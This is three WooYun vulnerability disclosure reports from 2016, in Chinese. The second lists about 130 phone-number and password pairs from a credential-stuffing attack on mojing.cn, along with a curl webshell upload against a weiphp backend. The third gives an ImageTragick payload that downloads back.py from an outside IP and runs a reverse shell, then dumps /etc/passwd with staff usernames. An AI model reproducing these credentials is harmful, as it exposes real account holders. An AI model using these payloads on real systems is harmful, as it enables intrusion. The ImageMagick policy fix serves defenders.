漏洞详情披露状态： 2016-05-13： 细节已通知厂商并且等待厂商处理中2016-05-18： 厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）简要描述：从任意文件下载到后台getshell，求一个首页可好漏洞hash：7548ae6adbaeb18ae7e6a3373239b7c4版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-18 12:20厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-04： 厂商已经确认，细节仅向厂商公开2016-05-14： 细节向核心白帽子及相关领域专家公开2016-05-24： 细节向普通白帽子公开2016-06-03： 细节向实习白帽子公开2016-06-18： 细节向公众公开简要描述：RT,键盘表哥收到了礼物，我也来一发详细说明：首先是撞库，成功撞出了一大堆的账户登录处未做次数以及验证码处理code 区域Payload1 Payload2 Length 13846177646 sdhoujie01 887 18180093239 wan6290012 884 13123276688 ninng183 882 13737026362 19770625 876 18291957456 zyh262509 876 15577110761 Dc19880717 876 18633762327 nnd86amc 874 13721477762 aini1314 872 18576432432 qq6935868 871 15659931773 hedaoqin55 868 13897463679 w96104216 868 18965665560 whf214145 868 13555542401 0325511y 868 18245301237 z6521426 868 13830289123 1116qiyang 861 18952455047 19881120 860 18020733707 fs0408039 860 15651767055 198566 860 18641191660 5624110 860 13915528614 Lh7758521 860 18735376992 lxx4424586 860 13336920317 a65476298 860 18628278998 yang6638253 860 18571471440 ps13388 860 15241766922 shishuai21 860 13581522846 asdf888 860 18883286082 a43630642 860 15800295032 a123456 860 13676799770 wsczh0418 860 13883649807 c83399780 860 13429232187 hzj1993523 855 15264728945 qq4252426 854 13777274896 w8892w63 852 18968180726 1714131211 852 13846071539 wj584521 852 13760341694 6209321 852 13770914589 zhang1984 852 13819272323 1925852625 852 15959025900 ilovebin 852 13264228811 77582589a 852 18621600258 qcx282 852 15030412563 11111a 848 15961078309 q8614789 848 18977150556 6841698 845 18078275817 qq4366456 844 15982557785 lixinxing 844 18511821121 61428202 844 18934311307 liyi801219 844 15129190467 watzx1314 842 15986989274 xwh5201314 841 15292319879 20052134 840 15166750959 19970721 840 15642877000 760219 840 13865041970 zjmzzl123 840 15775822345 520wenjie 840 13523649911 zhouyuan77 840 13736491447 992892323 840 18013730125 yinlei520 840 13549850518 830614 840 13424377369 19840420 840 13241814968 zmsx11 840 13877336700 ssdy931422 840 13600893906 z8356056 840 13525127305 www123456 840 13728072746 a5362257 840 15988438505 lxj620 840 18357363092 jy19900820 839 18694049554 q543203447 839 13099898899 zxcv1234 839 13241233214 sn6331907 838 13834904042 jj19810427 838 13738073127 alex1123 838 15250581862 ai198797 838 13717788554 197951 838 13410105357 a8895578 838 15800616740 134679 838 13722050101 364762298 838 18621704979 weed00 838 15629082135 1988927zs 838 13658502233 xushaoyuna 838 18805727654 yk890102 838 15277940262 11121314a 838 15073389123 a250275701 838 15018514831 swsw000 838 18073115125 19841224o 838 13784035359 ch820714 838 15961765073 a9880630 838 13698712331 3434158lyf 838 13919791750 1990127ybs 838 18621891698 liwei1981 838 13378120671 qw27764991 838 13223076570 8853qq 837 15935229909 19862188a 836 13728444422 a2639902 836 18626318507 3391929 835 15682138005 95ll10 835 15030091377 5461628 835 13817798135 zsh123 835 13828084568 hjj619000 835 18377906611 lby199061 835 13846467035 wwkfghy520 835 15653811505 gao123456 834 13872839824 123a123a 834 13422898453 7333133 833 13874408393 zl810315 833这些账户都能登录然后是xss，存在于魔镜开发者平台的反馈处code 区域http://open.mojing.cn/developer/feedback/submit然后是getshell，这个弄了好久，又学到了新姿势code 区域http://weixin.mojing.cn/index.php?s=/Home/User/login/from/1.html这个后台是用weiphp开发的参考这个漏洞code 区域 WooYun: weiphp3.0微信开发框架前台getshell第二弹(无需登录) 先在本地弄个shell文件然后通过以下这个命令将shell上传上去code 区域curl -F '[email protected]/* */' http://weixin.mojing.cn/index.php?s=/Home/File/uploadPicture/成功上传shell 漏洞证明：  修复方案：改改改版权声明：转载请注明来源 千机@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-04 15:38厂商回复：感谢您提交的漏洞，我们会尽快修复。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述：- -详细说明：下载官方app后 头像处抓包 上传看左上角的旋转图片 哈code 区域POST /upload.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.6) Content-Type: multipart/form-data; boundary=---------------------------123821742118716 Host: imgup.xin.com Accept-Encoding: gzip Content-Length: 300217 -----------------------------123821742118716 Content-Disposition: form-data; name="app" xin_app -----------------------------123821742118716 Content-Disposition: form-data; name="key" RdUAb6GF6uWjqW -----------------------------123821742118716 Content-Disposition: form-data; name="pic"; filename="crop.png" Content-Type:image/png push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|wget 115**02/back.py -O /tmp/x.py && python /tmp/x.py 115.**202 2333")' pop graphic-context -----------------------------123821742118716--图片内容code 区域push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|wget 115****202/back.py -O /tmp/x.py && python /tmp/x.py 1****.202 2333")' pop graphic-contextcode 区域sh-4.1$ pwd pwd /data1/webapps/imgup.xin.com/htdocscode 区域sh-4.1$ uname -a uname -a Linux d1601085.grid.nc.xin.com 2.6.32-573.el6.x86_64 #1 SMP Thu Jul 23 15:44:03 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 漏洞证明： code 区域sh-4.1$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin dingning:x:1001:1001:dingning,,,:/home/dingning:/bin/bash chenwei:x:1003:1003:chenwei,,,:/home/chenwei:/bin/bash songqipeng:x:1002:1002:songqipeng,,,:/home/songqipeng:/bin/bash chenlimin:x:1004:1004:chenlimin,,,:/home/chenlimin:/bin/bash chenkun:x:1005:1005:chenkun,,,:/home/chenkun:/bin/bash zhoujiangjun:x:1006:1006:zhoujiangjun,,,:/home/zhoujiangjun:/bin/bash nginx:x:510:510::/home/nginx:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin liuxiaopeng:x:1007:1007:liuxiaopeng,,,:/home/liuxiaopeng:/bin/bash houpengfei:x:1008:1008:houpengfei,,,:/home/houpengfei:/bin/bash修复方案：官方在6.9.3-9版本中对漏洞进行了不完全的修复使用policy file来防御这个漏洞，这个文件默认位置在 /etc/ImageMagick/policy.xml ，我们通过配置如下的xml来禁止解析https等敏感操作：<policymap><policy domain="coder" rights="none" pattern="EPHEMERAL" /><policy domain="coder" rights="none" pattern="URL" /><policy domain="coder" rights="none" pattern="HTTPS" /><policy domain="coder" rights="none" pattern="MVG" /><policy domain="coder" rights="none" pattern="MSL" /></policymap>版权声明：转载请注明来源 jianFen@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-09 15:16厂商回复：非常感谢，已经确认漏洞存在！最新状态：暂无